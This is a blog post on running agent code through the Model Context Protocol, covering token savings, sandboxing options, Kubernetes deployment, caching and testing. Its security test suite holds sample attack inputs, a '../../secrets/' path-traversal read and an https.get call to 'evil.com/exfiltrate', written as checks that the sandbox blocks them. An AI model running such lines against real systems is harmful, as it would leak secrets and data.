Table of Contents

MCP Infrastructure

Code Execution with MCP: 98.7% Token Reduction Through Efficient Agent Architecture

Anthropic's latest engineering insight reveals how code execution with Model Context Protocol can achieve 98.7% token reduction while enhancing security and performance. Here's what this means for production MCP infrastructure, quality engineering practices, and enterprise deployment strategies.

Published

November 4, 2025

Author

Bryan Thompson

Read Time

16 min read

Category

MCP Infrastructure

Tags

MCP
code execution
token optimization
security
production deployment
quality engineering
enterprise architecture

Source Attribution: This post provides triepod.ai's infrastructure engineering and production deployment perspective based on Anthropic's Code execution with MCP: Building more efficient AI agents engineering blog post by Adam Jones and Conor Kelly. We encourage readers to view the original article for complete technical details and official implementation examples.

On November 4, 2025, Anthropic published a groundbreaking engineering insight that fundamentally changes how we should think about MCP server architecture: code execution as a first-class capability for reducing token consumption while enhancing agent capabilities. The demonstration showing 98.7% token reduction in real-world scenarios isn't just impressive—it represents a paradigm shift in production AI infrastructure design.

For teams building production MCP servers, this insight raises critical questions: How do we implement secure code execution environments? What are the quality engineering implications? How does this change our approach to MCP server design? Let's explore what code execution with MCP means for enterprise infrastructure.

The Token Consumption Crisis

Traditional MCP architectures face a fundamental scaling problem: as agents interact with more tools and data sources, token consumption grows exponentially. Every tool definition, every data transformation, every intermediate result consumes precious context window space.

Traditional MCP Token Overhead

Full Tool Schema Loading

Every available tool must be described in the context window, consuming thousands of tokens even when unused

Complete Dataset Transmission

Large datasets must be sent in their entirety to the model for processing and filtering

Intermediate Result Bloat

Every transformation step accumulates in the conversation history, degrading performance

Sequential Processing Latency

Complex operations require multiple model round-trips, each incurring API latency

In production environments, these constraints translate to real costs: higher API bills, slower response times, and architectural complexity managing context window limitations. The traditional approach of exposing every capability as a separate tool doesn't scale.

Code Execution Paradigm Shift

Code execution with MCP inverts the traditional architecture: instead of exposing hundreds of specialized tools, you provide a secure execution environment where agents can dynamically discover, filter, and compose capabilities programmatically.

Code Execution Efficiency Gains

98.7% Token Reduction

Anthropic's demonstration shows dramatic token savings through in-execution filtering and processing

Dynamic Tool Discovery

Agents can query available capabilities on-demand rather than loading all schemas upfront

In-Execution Data Filtering

Process large datasets in the execution environment, returning only relevant results to the model

Reduced Latency

Time to first token improves dramatically with fewer API round-trips

This isn't just an optimization—it's a fundamental rethinking of MCP architecture that enables capabilities previously impossible due to token constraints.

TYPESCRIPT
1// Traditional MCP Pattern: High Token Overhead
2// Every tool schema loaded into context
3const tools = [
4 { name: "list_files", schema: {...}, description: "..." },
5 { name: "read_file", schema: {...}, description: "..." },
6 { name: "search_files", schema: {...}, description: "..." },
7 // ... 100 more tool definitions
8];
9
10// Code Execution Pattern: Dynamic Discovery
11// Agent queries capabilities on-demand
12const availableTools = await executeCode(`
13 // List available filesystem operations
14 const fs = require('fs');
15 return Object.keys(fs).filter(k => typeof fs[k] === 'function');
16`);
17
18// Agent processes data in execution environment
19const results = await executeCode(`
20 const fs = require('fs');
21 const files = fs.readdirSync('./data');
22
23 // Filter in execution environment
24 const relevantFiles = files
25 .filter(f => f.includes('2025'))
26 .map(f => ({ name: f, size: fs.statSync(`./data/${f}`).size }))
27 .filter(f => f.size < 1000000);
28
29 // Return only processed results
30 return relevantFiles;
31`);
32
33// Token savings: Only final results transmitted to model
34// Original approach: 10,000+ tokens for all file metadata
35// Code execution: 200 tokens for filtered results
36// Reduction: 98%

Architecture and Implementation Patterns

Implementing code execution with MCP requires careful architectural decisions about execution environments, capability exposure, and state management.

Execution Environment Design

The execution environment is the foundation of this architecture. It must balance capability exposure with security isolation, performance with resource constraints.

TYPESCRIPT
1// MCP Server with Code Execution Environment
2import { Server } from '@modelcontextprotocol/sdk/server/index.js';
3import { StdioServerTransport } from '@modelcontextprotocol/sdk/server/stdio.js';
4import { VM } from 'vm2'; // Secure JavaScript execution
5
6class CodeExecutionMCPServer {
7 private server: Server;
8 private vm: VM;
9
10 constructor() {
11 this.server = new Server({
12 name: 'code-execution-mcp',
13 version: '1.0.0',
14 }, {
15 capabilities: {
16 tools: {}, // Expose code execution tool
17 resources: {} // Expose filesystem resources
18 }
19 });
20
21 // Create isolated execution environment
22 this.vm = new VM({
23 timeout: 5000, // 5 second execution limit
24 sandbox: {
25 // Controlled API exposure
26 fs: this.createSecureFilesystemAPI(),
27 console: this.createMonitoredConsole(),
28 // Custom MCP operations
29 mcp: this.createMCPOperations()
30 }
31 });
32
33 this.setupHandlers();
34 }
35
36 private createSecureFilesystemAPI() {
37 // Sandboxed filesystem access
38 return {
39 readdirSync: (path: string) => {
40 // Path traversal protection
41 const sanitized = this.sanitizePath(path);
42 // Allowlist verification
43 if (!this.isPathAllowed(sanitized)) {
44 throw new Error('Path access denied');
45 }
46 return fs.readdirSync(sanitized);
47 },
48 // ... other secured filesystem operations
49 };
50 }
51
52 private setupHandlers() {
53 // Handle code execution requests
54 this.server.setRequestHandler(ToolCallRequestSchema,
55 async (request) => {
56 if (request.params.name === 'execute_code') {
57 const code = request.params.arguments?.code as string;
58 const result = await this.executeSecurely(code);
59 return {
60 content: [{ type: 'text', text: JSON.stringify(result) }]
61 };
62 }
63 }
64 );
65 }
66
67 private async executeSecurely(code: string): Promise<any> {
68 try {
69 // Execute in isolated VM with timeout protection
70 const result = this.vm.run(code);
71
72 // Log execution for audit trail
73 this.logExecution(code, result);
74
75 return result;
76 } catch (error) {
77 // Handle execution errors safely
78 return { error: error.message };
79 }
80 }
81}
82
83export const server = new CodeExecutionMCPServer();

Dynamic Tool Discovery Pattern

Rather than exposing hundreds of tools, expose a capability discovery mechanism that agents can query programmatically.

TYPESCRIPT
1// Agent discovers capabilities dynamically
2const discoverTools = async () => {
3 const code = `
4 // Query available filesystem operations
5 const fsOps = Object.keys(mcp.fs)
6 .filter(k => typeof mcp.fs[k] === 'function')
7 .map(k => ({
8 name: k,
9 description: mcp.fs[k].toString().match(/\/\*\*([^*]|\*(?!\/))*\*\//)?.[0]
10 }));
11
12 // Query available database operations
13 const dbOps = Object.keys(mcp.db)
14 .filter(k => typeof mcp.db[k] === 'function')
15 .map(k => ({ name: k, signature: mcp.db[k].toString() }));
16
17 return { filesystem: fsOps, database: dbOps };
18 `;
19
20 return await executeCode(code);
21};
22
23// Agent uses discovered capabilities
24const capabilities = await discoverTools();
25
26// Only load schemas for tools actually needed
27const readFileSchema = capabilities.filesystem
28 .find(op => op.name === 'readFile');
29
30// Execute operation in code environment
31const fileContents = await executeCode(`
32 return mcp.fs.readFile('./config.json', 'utf8');
33`);
34
35// Token comparison:
36// Traditional: 5000 tokens (all filesystem tool schemas)
37// Dynamic discovery: 200 tokens (query + specific operation)
38// Reduction: 96%

Security and Sandboxing Requirements

Anthropic correctly emphasizes that code execution requires "secure execution environment with appropriate sandboxing." This isn't optional—it's the foundation of production-ready code execution with MCP.

Critical Security Requirements

Process Isolation

Code execution must occur in isolated processes with strict resource limits (CPU, memory, network)

Filesystem Sandboxing

Path traversal protection, allowlisting, and permission enforcement prevent unauthorized access

Network Restrictions

Outbound network access must be controlled through explicit allowlists or completely disabled

Execution Time Limits

Strict timeout enforcement prevents infinite loops and resource exhaustion attacks

Audit Logging

Complete execution audit trail for security investigation and compliance requirements

Sandboxing Implementation Options

TYPESCRIPT
1// Option 1: VM2 for JavaScript Isolation (Development)
2import { VM } from 'vm2';
3
4const vm = new VM({
5 timeout: 5000,
6 sandbox: { /* controlled API */ },
7 eval: false,
8 wasm: false
9});
10
11// Option 2: Docker Containers (Production)
12import Docker from 'dockerode';
13
14const docker = new Docker();
15
16async function executeInContainer(code: string) {
17 const container = await docker.createContainer({
18 Image: 'node:18-alpine',
19 Cmd: ['node', '-e', code],
20 NetworkDisabled: true,
21 Memory: 256 * 1024 * 1024, // 256MB limit
22 MemorySwap: 256 * 1024 * 1024,
23 CpuShares: 512,
24 AttachStdout: true,
25 AttachStderr: true
26 });
27
28 await container.start();
29
30 const timeout = setTimeout(async () => {
31 await container.kill();
32 }, 5000);
33
34 const stream = await container.logs({
35 stdout: true,
36 stderr: true,
37 follow: true
38 });
39
40 let output = '';
41 stream.on('data', (chunk) => { output += chunk.toString(); });
42
43 await container.wait();
44 clearTimeout(timeout);
45 await container.remove();
46
47 return output;
48}
49
50// Option 3: gVisor for Strong Kernel Isolation (Enterprise)
51// Use gVisor runtime with Docker for kernel-level isolation
52const secureContainer = await docker.createContainer({
53 Image: 'code-execution-env',
54 Runtime: 'runsc', // gVisor runtime
55 Cmd: ['node', '-e', code],
56 // ... security constraints
57});
58
59// Option 4: WebAssembly Sandboxing
60// Compile code to WASM for browser-level isolation
61import { WASI } from 'wasi';
62import { readFileSync } from 'fs';
63
64const wasi = new WASI({
65 args: process.argv,
66 env: {},
67 preopens: {
68 '/sandbox': '/tmp/sandbox' // Limited filesystem access
69 }
70});
71
72const wasm = await WebAssembly.compile(
73 readFileSync('./code-execution.wasm')
74);
75
76const instance = await WebAssembly.instantiate(wasm, {
77 wasi_snapshot_preview1: wasi.wasiImport
78});
79
80wasi.start(instance);

For production deployments, Docker containers with gVisor provide the best balance of security, performance, and operational simplicity. VM2 is suitable for development but shouldn't be used in production with untrusted code.

Production Deployment Strategies

Deploying code execution capabilities in production requires infrastructure planning beyond simple sandboxing. You need container orchestration, resource management, and monitoring infrastructure.

Kubernetes Deployment Architecture

YAML
1# Kubernetes deployment for code execution MCP server
2apiVersion: apps/v1
3kind: Deployment
4metadata:
5 name: code-execution-mcp
6spec:
7 replicas: 3
8 selector:
9 matchLabels:
10 app: code-execution-mcp
11 template:
12 metadata:
13 labels:
14 app: code-execution-mcp
15 spec:
16 # Security context for pod
17 securityContext:
18 runAsNonRoot: true
19 runAsUser: 1000
20 fsGroup: 1000
21 seccompProfile:
22 type: RuntimeDefault
23
24 containers:
25 - name: mcp-server
26 image: code-execution-mcp:latest
27
28 # Resource limits critical for security
29 resources:
30 requests:
31 memory: "512Mi"
32 cpu: "500m"
33 limits:
34 memory: "1Gi"
35 cpu: "1000m"
36
37 # Security hardening
38 securityContext:
39 allowPrivilegeEscalation: false
40 readOnlyRootFilesystem: true
41 capabilities:
42 drop: ["ALL"]
43
44 # Environment configuration
45 env:
46 - name: EXECUTION_TIMEOUT
47 value: "5000"
48 - name: MAX_MEMORY_MB
49 value: "256"
50 - name: ENABLE_NETWORK
51 value: "false"
52
53 # Health checks
54 livenessProbe:
55 httpGet:
56 path: /health
57 port: 8080
58 initialDelaySeconds: 30
59 periodSeconds: 10
60
61 readinessProbe:
62 httpGet:
63 path: /ready
64 port: 8080
65 initialDelaySeconds: 5
66 periodSeconds: 5
67
68 # Logging configuration
69 volumeMounts:
70 - name: logs
71 mountPath: /var/log/mcp
72
73 # Ephemeral volume for logs
74 volumes:
75 - name: logs
76 emptyDir: {}
77
78---
79# Service for MCP server
80apiVersion: v1
81kind: Service
82metadata:
83 name: code-execution-mcp
84spec:
85 selector:
86 app: code-execution-mcp
87 ports:
88 - port: 8080
89 targetPort: 8080
90
91---
92# Network policy restricting outbound access
93apiVersion: networking.k8s.io/v1
94kind: NetworkPolicy
95metadata:
96 name: code-execution-isolation
97spec:
98 podSelector:
99 matchLabels:
100 app: code-execution-mcp
101 policyTypes:
102 - Ingress
103 - Egress
104 ingress:
105 - from:
106 - podSelector:
107 matchLabels:
108 role: mcp-client
109 ports:
110 - protocol: TCP
111 port: 8080
112 egress:
113 - to:
114 - podSelector:
115 matchLabels:
116 role: database
117 ports:
118 - protocol: TCP
119 port: 5432
120 # No other egress allowed - code execution is isolated

Resource Management and Auto-Scaling

YAML
1# Horizontal Pod Autoscaler for code execution workloads
2apiVersion: autoscaling/v2
3kind: HorizontalPodAutoscaler
4metadata:
5 name: code-execution-mcp-hpa
6spec:
7 scaleTargetRef:
8 apiVersion: apps/v1
9 kind: Deployment
10 name: code-execution-mcp
11 minReplicas: 3
12 maxReplicas: 20
13 metrics:
14 # Scale on CPU utilization
15 - type: Resource
16 resource:
17 name: cpu
18 target:
19 type: Utilization
20 averageUtilization: 70
21 # Scale on memory utilization
22 - type: Resource
23 resource:
24 name: memory
25 target:
26 type: Utilization
27 averageUtilization: 80
28 # Scale on custom metrics (execution queue depth)
29 - type: Pods
30 pods:
31 metric:
32 name: execution_queue_depth
33 target:
34 type: AverageValue
35 averageValue: "10"
36 behavior:
37 scaleDown:
38 stabilizationWindowSeconds: 300
39 policies:
40 - type: Percent
41 value: 50
42 periodSeconds: 60
43 scaleUp:
44 stabilizationWindowSeconds: 60
45 policies:
46 - type: Percent
47 value: 100
48 periodSeconds: 30
49
50---
51# Pod Disruption Budget for high availability
52apiVersion: policy/v1
53kind: PodDisruptionBudget
54metadata:
55 name: code-execution-mcp-pdb
56spec:
57 minAvailable: 2
58 selector:
59 matchLabels:
60 app: code-execution-mcp

Performance Optimization Techniques

While code execution dramatically reduces token consumption, execution overhead can impact latency. Smart caching and execution planning minimize this impact.

Result Caching Strategy

TYPESCRIPT
1// Intelligent caching for code execution results
2import { createHash } from 'crypto';
3import Redis from 'ioredis';
4
5class ExecutionCache {
6 private redis: Redis;
7 private ttl: number = 3600; // 1 hour default
8
9 constructor() {
10 this.redis = new Redis({
11 host: process.env.REDIS_HOST,
12 port: parseInt(process.env.REDIS_PORT || '6379'),
13 // Cluster configuration for production
14 enableReadyCheck: true,
15 maxRetriesPerRequest: 3
16 });
17 }
18
19 private generateCacheKey(code: string, context: any): string {
20 // Hash code + context for cache key
21 const content = JSON.stringify({ code, context });
22 return `exec:${createHash('sha256').update(content).digest('hex')}`;
23 }
24
25 async getCached(code: string, context: any): Promise<any | null> {
26 const key = this.generateCacheKey(code, context);
27 const cached = await this.redis.get(key);
28
29 if (cached) {
30 // Track cache hit metrics
31 this.metrics.increment('execution.cache.hit');
32 return JSON.parse(cached);
33 }
34
35 this.metrics.increment('execution.cache.miss');
36 return null;
37 }
38
39 async setCached(
40 code: string,
41 context: any,
42 result: any,
43 ttl?: number
44 ): Promise<void> {
45 const key = this.generateCacheKey(code, context);
46 await this.redis.setex(
47 key,
48 ttl || this.ttl,
49 JSON.stringify(result)
50 );
51 }
52
53 async invalidatePattern(pattern: string): Promise<void> {
54 // Invalidate cache entries matching pattern
55 const keys = await this.redis.keys(`exec:*${pattern}*`);
56 if (keys.length > 0) {
57 await this.redis.del(...keys);
58 }
59 }
60}
61
62// Usage in MCP server
63class CodeExecutionMCPServer {
64 private cache: ExecutionCache;
65
66 async executeCode(code: string, context: any): Promise<any> {
67 // Check cache first
68 const cached = await this.cache.getCached(code, context);
69 if (cached) {
70 return cached;
71 }
72
73 // Execute if not cached
74 const result = await this.vm.run(code);
75
76 // Determine cacheable based on code analysis
77 if (this.isCacheable(code)) {
78 await this.cache.setCached(code, context, result);
79 }
80
81 return result;
82 }
83
84 private isCacheable(code: string): boolean {
85 // Don't cache code with time-sensitive operations
86 const nonCacheablePatterns = [
87 /new Date\(/,
88 /Math\.random\(/,
89 /Date\.now\(/,
90 /performance\.now\(/
91 ];
92
93 return !nonCacheablePatterns.some(pattern => pattern.test(code));
94 }
95}

Connection Pooling for Container Execution

TYPESCRIPT
1// Container pool for faster execution startup
2class ContainerPool {
3 private pool: Docker.Container[];
4 private available: Docker.Container[];
5 private poolSize: number = 10;
6
7 constructor(private docker: Docker) {
8 this.pool = [];
9 this.available = [];
10 }
11
12 async initialize(): Promise<void> {
13 // Pre-warm container pool
14 const containers = await Promise.all(
15 Array(this.poolSize).fill(null).map(() =>
16 this.createContainer()
17 )
18 );
19
20 this.pool = containers;
21 this.available = [...containers];
22 }
23
24 private async createContainer(): Promise<Docker.Container> {
25 return await this.docker.createContainer({
26 Image: 'code-execution-env:latest',
27 NetworkDisabled: true,
28 Memory: 256 * 1024 * 1024,
29 Tty: false,
30 OpenStdin: true,
31 StdinOnce: false,
32 // Keep container alive for reuse
33 Cmd: ['node', '--eval', 'process.stdin.resume()']
34 });
35 }
36
37 async acquire(): Promise<Docker.Container> {
38 // Wait for available container
39 while (this.available.length === 0) {
40 await new Promise(resolve => setTimeout(resolve, 100));
41 }
42
43 const container = this.available.shift()!;
44
45 // Ensure container is running
46 const info = await container.inspect();
47 if (!info.State.Running) {
48 await container.start();
49 }
50
51 return container;
52 }
53
54 async release(container: Docker.Container): Promise<void> {
55 // Reset container state
56 await this.cleanupContainer(container);
57
58 // Return to available pool
59 this.available.push(container);
60 }
61
62 private async cleanupContainer(
63 container: Docker.Container
64 ): Promise<void> {
65 // Remove any created files
66 await container.exec({
67 Cmd: ['sh', '-c', 'rm -rf /tmp/*'],
68 AttachStdout: false,
69 AttachStderr: false
70 });
71
72 // Clear process state
73 // (implementation depends on execution model)
74 }
75
76 async destroy(): Promise<void> {
77 // Cleanup all containers
78 await Promise.all(
79 this.pool.map(async (container) => {
80 try {
81 await container.stop();
82 await container.remove();
83 } catch (error) {
84 // Already stopped/removed
85 }
86 })
87 );
88 }
89}
90
91// Usage reduces cold start latency from ~2s to ~50ms
92const pool = new ContainerPool(docker);
93await pool.initialize();
94
95async function executeWithPool(code: string): Promise<any> {
96 const container = await pool.acquire();
97 try {
98 const result = await executeInContainer(container, code);
99 return result;
100 } finally {
101 await pool.release(container);
102 }
103}

Enterprise Implementation Guidelines

Enterprise deployments require additional considerations around compliance, audit logging, and data privacy that go beyond basic sandboxing.

Privacy-Preserving Execution

Anthropic highlights that code execution supports "privacy-preserving operations by keeping intermediate results in execution environment" and "automatically tokenizing sensitive data." This is critical for enterprise compliance.

TYPESCRIPT
1// Privacy-preserving data processing in execution environment
2class PrivacyPreservingExecutor {
3 async processCustomerData(customerIds: string[]): Promise<any> {
4 // Execute data processing in secure environment
5 const code = `
6 const { tokenize, process } = mcp.privacy;
7
8 // Load customer data in execution environment
9 const customers = await mcp.db.query(
10 'SELECT * FROM customers WHERE id = ANY($1)',
11 [customerIds]
12 );
13
14 // Process without exposing PII to model
15 const insights = customers.map(customer => {
16 // Tokenize PII fields
17 const tokenized = {
18 customerId: tokenize(customer.id),
19 email: tokenize(customer.email),
20 // Aggregate, non-PII insights only
21 purchaseCount: customer.orders.length,
22 avgOrderValue: customer.orders.reduce(
23 (sum, order) => sum + order.total, 0
24 ) / customer.orders.length,
25 lastPurchase: customer.orders[0]?.date
26 };
27
28 return tokenized;
29 });
30
31 // Return aggregated insights only
32 return {
33 totalCustomers: insights.length,
34 avgPurchaseCount: insights.reduce(
35 (sum, i) => sum + i.purchaseCount, 0
36 ) / insights.length,
37 avgOrderValue: insights.reduce(
38 (sum, i) => sum + i.avgOrderValue, 0
39 ) / insights.length
40 };
41 `;
42
43 // Execute code - PII never transmitted to model
44 return await this.execute(code);
45 }
46}
47
48// Audit logging for compliance
49class AuditLogger {
50 async logExecution(execution: {
51 code: string;
52 user: string;
53 timestamp: Date;
54 dataAccessed: string[];
55 result: any;
56 }): Promise<void> {
57 // Comprehensive audit trail
58 await this.db.query(`
59 INSERT INTO execution_audit_log (
60 execution_id,
61 user_id,
62 timestamp,
63 code_hash,
64 data_accessed,
65 execution_duration_ms,
66 result_summary
67 ) VALUES ($1, $2, $3, $4, $5, $6, $7)
68 `, [
69 uuidv4(),
70 execution.user,
71 execution.timestamp,
72 this.hashCode(execution.code),
73 JSON.stringify(execution.dataAccessed),
74 execution.durationMs,
75 this.summarizeResult(execution.result)
76 ]);
77 }
78
79 // Compliance reporting
80 async generateComplianceReport(
81 startDate: Date,
82 endDate: Date
83 ): Promise<ComplianceReport> {
84 // Query audit log for compliance reporting
85 const executions = await this.db.query(`
86 SELECT
87 user_id,
88 COUNT(*) as execution_count,
89 jsonb_array_elements_text(data_accessed) as accessed_table,
90 COUNT(DISTINCT accessed_table) as unique_tables_accessed
91 FROM execution_audit_log
92 WHERE timestamp BETWEEN $1 AND $2
93 GROUP BY user_id, accessed_table
94 `, [startDate, endDate]);
95
96 return this.formatComplianceReport(executions);
97 }
98}

Quality Engineering and Testing

Code execution with MCP introduces new testing requirements beyond traditional MCP server validation. You need to test sandbox escape attempts, resource exhaustion scenarios, and execution correctness.

TYPESCRIPT
1// Comprehensive test suite for code execution MCP server
2describe('Code Execution MCP Server', () => {
3 describe('Security Tests', () => {
4 it('should prevent filesystem traversal attacks', async () => {
5 const maliciousCode = `
6 const fs = require('fs');
7 return fs.readdirSync('../../secrets/');
8 `;
9
10 await expect(
11 executeCode(maliciousCode)
12 ).rejects.toThrow('Path access denied');
13 });
14
15 it('should prevent network access', async () => {
16 const maliciousCode = `
17 const https = require('https');
18 return new Promise((resolve) => {
19 https.get('https://evil.com/exfiltrate', resolve);
20 });
21 `;
22
23 await expect(
24 executeCode(maliciousCode)
25 ).rejects.toThrow('Network access denied');
26 });
27
28 it('should enforce execution timeout', async () => {
29 const infiniteLoop = `
30 while(true) { /* infinite loop */ }
31 `;
32
33 const start = Date.now();
34 await expect(
35 executeCode(infiniteLoop)
36 ).rejects.toThrow('Execution timeout');
37
38 const duration = Date.now() - start;
39 expect(duration).toBeLessThan(6000); // 5s timeout + 1s buffer
40 });
41
42 it('should enforce memory limits', async () => {
43 const memoryExhaustion = `
44 const arrays = [];
45 while(true) {
46 arrays.push(new Array(1000000).fill('x'));
47 }
48 `;
49
50 await expect(
51 executeCode(memoryExhaustion)
52 ).rejects.toThrow('Memory limit exceeded');
53 });
54 });
55
56 describe('Correctness Tests', () => {
57 it('should execute valid data transformations', async () => {
58 const code = `
59 const data = [1, 2, 3, 4, 5];
60 return data
61 .filter(x => x % 2 === 0)
62 .map(x => x * 2);
63 `;
64
65 const result = await executeCode(code);
66 expect(result).toEqual([4, 8]);
67 });
68
69 it('should preserve execution context across calls', async () => {
70 // First execution sets state
71 await executeCode(`
72 mcp.state.counter = 0;
73 `);
74
75 // Second execution reads state
76 const result = await executeCode(`
77 return ++mcp.state.counter;
78 `);
79
80 expect(result).toBe(1);
81 });
82 });
83
84 describe('Performance Tests', () => {
85 it('should complete execution within latency budget', async () => {
86 const code = `
87 const fs = require('fs');
88 const files = fs.readdirSync('./data');
89 return files.filter(f => f.endsWith('.json'));
90 `;
91
92 const start = Date.now();
93 await executeCode(code);
94 const duration = Date.now() - start;
95
96 // Execution should complete in <100ms
97 expect(duration).toBeLessThan(100);
98 });
99
100 it('should handle concurrent executions', async () => {
101 const executions = Array(100).fill(null).map((_, i) =>
102 executeCode(`return ${i} * 2;`)
103 );
104
105 const results = await Promise.all(executions);
106
107 // Verify all executions completed correctly
108 results.forEach((result, i) => {
109 expect(result).toBe(i * 2);
110 });
111 });
112 });
113
114 describe('Integration Tests', () => {
115 it('should integrate with MCP filesystem resources', async () => {
116 const code = `
117 // Access filesystem through MCP resource API
118 const content = await mcp.resources.read(
119 'file:///data/config.json'
120 );
121 return JSON.parse(content);
122 `;
123
124 const result = await executeCode(code);
125 expect(result).toHaveProperty('apiKey');
126 });
127
128 it('should integrate with MCP database tools', async () => {
129 const code = `
130 // Query database through MCP tool API
131 const users = await mcp.tools.call('db_query', {
132 sql: 'SELECT COUNT(*) FROM users WHERE active = true'
133 });
134 return users[0].count;
135 `;
136
137 const result = await executeCode(code);
138 expect(typeof result).toBe('number');
139 });
140 });
141});

Future Implications for MCP Infrastructure

Code execution with MCP isn't just an optimization technique—it's a fundamental shift in how we should think about MCP server architecture. The implications extend far beyond token reduction.

Future Architecture Patterns

Composable MCP Capabilities

Code execution enables agents to compose capabilities dynamically rather than requiring pre-defined tool combinations

Higher-Level Abstractions

Build libraries of reusable code patterns that agents can leverage without tool schema overhead

Stateful Agent Workflows

Maintain execution state across multi-step operations without bloating conversation history

Edge Computing Patterns

Process data closer to its source, transmitting only insights to the model rather than raw data

As MCP ecosystems mature, we'll see code execution become a standard capability rather than an advanced pattern. The 98.7% token reduction demonstrated by Anthropic isn't just impressive—it's economically necessary for complex multi-agent systems operating at scale.

The challenge for infrastructure teams is implementing secure, performant code execution environments before they become a competitive requirement. Organizations that master this pattern early will have significant advantages in building sophisticated AI systems that remain cost-effective at scale.

Need Help Implementing Code Execution with MCP?

Building production-ready code execution infrastructure requires deep expertise in sandboxing, Kubernetes orchestration, and MCP architecture patterns. Let's discuss your implementation strategy.